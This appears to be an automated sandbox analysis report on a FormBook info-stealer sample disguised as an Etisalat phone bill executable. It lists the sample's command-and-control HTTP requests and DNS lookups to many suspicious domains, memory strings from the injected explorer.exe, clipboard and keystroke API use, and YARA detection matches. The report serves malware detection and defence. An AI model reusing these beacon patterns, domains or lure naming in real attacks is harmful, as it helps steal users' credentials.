Source: global traffic	HTTP traffic detected: GET /pt46/?-ZYp=fvRlPd_pa8MLs2&BXIxB=OxzdZkr64UrrS3tZ4G1zrrfmnH6WbOReSG/AAD7fX8giKNq6IAa+s9RhfDA3xDtWjS7D HTTP/1.1Host: www.seoservicesdelhi.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pt46/?BXIxB=QVbB1/CFLfZKQUfa4MrWfFSxGk6qL/qIHQ35N54fxEy/BWtxzW12LUdW+9Y4XXWGvNLo&-ZYp=fvRlPd_pa8MLs2 HTTP/1.1Host: www.wheresthechocolateat.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pt46/?BXIxB=FNzjLCNxKg4LnG2n+y3Cc1p/SDbqNFm/9WFnTrWlxnnrh9nJEYJm3P779kB2uMZreiO6&-ZYp=fvRlPd_pa8MLs2 HTTP/1.1Host: www.melliccine.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pt46/?-ZYp=fvRlPd_pa8MLs2&BXIxB=AkSBx0MHJHngnyc0Mde9hHB0CQHAj9XhopBfdHKzsou0ftXFKmhTuyA9cdbN6/Nfe1ve HTTP/1.1Host: www.trenchonbirmingham.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic	DNS traffic detected: DNS query: www.twinportslocal.com
Source: global traffic	DNS traffic detected: DNS query: www.vasymaman.com
Source: global traffic	DNS traffic detected: DNS query: www.iiixc759q.xyz
Source: global traffic	DNS traffic detected: DNS query: www.nihilculturamail.com
Source: global traffic	DNS traffic detected: DNS query: www.gv3l1.vip
Source: global traffic	DNS traffic detected: DNS query: www.healthsaveplus.com
Source: global traffic	DNS traffic detected: DNS query: www.seoservicesdelhi.net
Source: global traffic	DNS traffic detected: DNS query: www.wheresthechocolateat.com
Source: global traffic	DNS traffic detected: DNS query: www.wguujb.com
Source: global traffic	DNS traffic detected: DNS query: www.melliccine.com
Source: global traffic	DNS traffic detected: DNS query: www.trenchonbirmingham.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 30 Aug 2024 08:29:41 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4514Connection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Fri, 30 Aug 2024 08:29:56 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OBOUJ8ccdfkXKfGRbiWru9NRiOmPwq1dexqXLc9gwUaZpGx1qQPSY9GQjHRmsoVsjlpwqOvLA9bRHocvs9Pl9jFhwvnIC227DkZ4OSovocTpTK%2B1l%2F8WTZxNAI60cRXN4arO3g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=8.999825X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-Download-Options: noopenServer: cloudflareCF-RAY: 8bb36a1c2ff64261-EWRalt-svc: h3=":443"; ma=86400Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d Data Ascii: <!DOCTYPE html> <html class="no-js" lang="en-US"> <head><title>Attention Required! | Cloudflare</title><m

Source: explorer.exe, 00000003.00000000.2042336516.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4491886070.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2042336516.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4491886070.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000003.00000002.4486550852.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2027472063.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.v
Source: explorer.exe, 00000003.00000000.2042336516.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4491886070.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2042336516.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4491886070.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000003.00000000.2042336516.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4491886070.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2042336516.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4491886070.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000003.00000000.2042336516.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4491886070.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2042336516.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4491886070.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000003.00000002.4491886070.00000000099B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2042336516.00000000099B0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000003.00000000.2041278354.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.2041784905.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.2041756033.0000000008870000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.arlatwestern.shop
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.arlatwestern.shop/pt46/
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.arlatwestern.shop/pt46/www.jrd3s.rest
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.arlatwestern.shopReferer:
Source: explorer.exe, 00000003.00000000.2044974107.000000000C81C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.A
Source: explorer.exe, 00000003.00000000.2044974107.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3097187638.000000000C8E6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3095387314.000000000C8CB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dental-implants-89083.bond
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dental-implants-89083.bond/pt46/
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dental-implants-89083.bond/pt46/www.arlatwestern.shop
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dental-implants-89083.bondReferer:
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dreziuy.xyz
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dreziuy.xyz/pt46/
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dreziuy.xyz/pt46/www.dental-implants-89083.bond
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dreziuy.xyzReferer:
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gv3l1.vip
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gv3l1.vip/pt46/
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gv3l1.vip/pt46/www.healthsaveplus.com
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gv3l1.vipReferer:
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.healthsaveplus.com
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.healthsaveplus.com/pt46/
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.healthsaveplus.com/pt46/www.seoservicesdelhi.net
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.healthsaveplus.comReferer:
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.iiixc759q.xyz
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.iiixc759q.xyz/pt46/
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.iiixc759q.xyz/pt46/www.nihilculturamail.com
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.iiixc759q.xyzReferer:
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jrd3s.rest
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jrd3s.rest/pt46/
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jrd3s.rest/pt46/www.learneracademy.net
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jrd3s.restReferer:
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.learneracademy.net
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.learneracademy.net/pt46/
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.learneracademy.net/pt46/c
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.learneracademy.netReferer:
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.melliccine.com
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.melliccine.com/pt46/
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.melliccine.com/pt46/www.trenchonbirmingham.com
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.melliccine.comReferer:
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.nihilculturamail.com
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.nihilculturamail.com/pt46/
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.nihilculturamail.com/pt46/www.gv3l1.vip
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.nihilculturamail.comReferer:
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.seoservicesdelhi.net
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.seoservicesdelhi.net/pt46/
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.seoservicesdelhi.net/pt46/www.wheresthechocolateat.com
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.seoservicesdelhi.netReferer:
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.trenchonbirmingham.com
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.trenchonbirmingham.com/pt46/
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.trenchonbirmingham.com/pt46/www.dreziuy.xyz
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.trenchonbirmingham.comReferer:
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.twinportslocal.com
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.twinportslocal.com/pt46/
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.twinportslocal.com/pt46/www.vasymaman.com
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.twinportslocal.comReferer:
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vasymaman.com
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vasymaman.com/pt46/
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vasymaman.com/pt46/www.iiixc759q.xyz
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vasymaman.comReferer:
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.wguujb.com
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.wguujb.com/pt46/
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.wguujb.com/pt46/www.melliccine.com
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.wguujb.comReferer:
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.wheresthechocolateat.com
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.wheresthechocolateat.com/pt46/
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.wheresthechocolateat.com/pt46/www.wguujb.com
Source: explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.wheresthechocolateat.comReferer:
Source: explorer.exe, 00000003.00000002.4495253609.000000000C54C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096247991.000000000C547000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2044490024.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000003.00000002.4489159075.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2040468425.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000003.00000002.4491886070.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2042336516.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000003.00000002.4489159075.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2040468425.0000000007637000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000003.00000003.3097688245.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4487895084.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3809508104.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2029184765.00000000035FA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.coml
Source: explorer.exe, 00000003.00000003.3814791778.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3808468308.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2042336516.0000000009BAD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4492679076.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3095809901.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000003.00000003.3808468308.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2042336516.0000000009BAD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3095809901.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3813043800.0000000009C92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4492753701.0000000009D42000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000003.00000002.4494950647.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2044490024.000000000C460000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000003.00000002.4498093805.000000001132F000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4487592639.000000000631F000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://status.squarespace.com
Source: explorer.exe, 00000003.00000002.4491886070.00000000099B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2042336516.00000000099B0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/)s
Source: explorer.exe, 00000003.00000002.4491886070.00000000099B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2042336516.00000000099B0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.comon

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe

Code function: 0_2_0091EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_0091EAFF

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe

Code function: 0_2_0091ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_0091ED6A

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe

0_2_0091EAFF

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe

Code function: 0_2_0090AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

0_2_0090AA57

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe

Code function: 0_2_00939576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00939576

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Etisalat Summary Bill for the Month of August.exe.3810000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Etisalat Summary Bill for the Month of August.exe.3810000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2082860497.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4486741403.0000000005520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2082424231.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4486811482.0000000005570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2082242676.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4486403217.00000000050B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2025613057.0000000003810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Etisalat Summary Bill for the Month of August.exe.3810000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.Etisalat Summary Bill for the Month of August.exe.3810000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Etisalat Summary Bill for the Month of August.exe.3810000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Etisalat Summary Bill for the Month of August.exe.3810000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.Etisalat Summary Bill for the Month of August.exe.3810000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Etisalat Summary Bill for the Month of August.exe.3810000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.2082860497.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2082860497.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.2082860497.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.4486741403.0000000005520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4486741403.0000000005520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.4486741403.0000000005520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.2082424231.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2082424231.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.2082424231.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.4486811482.0000000005570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
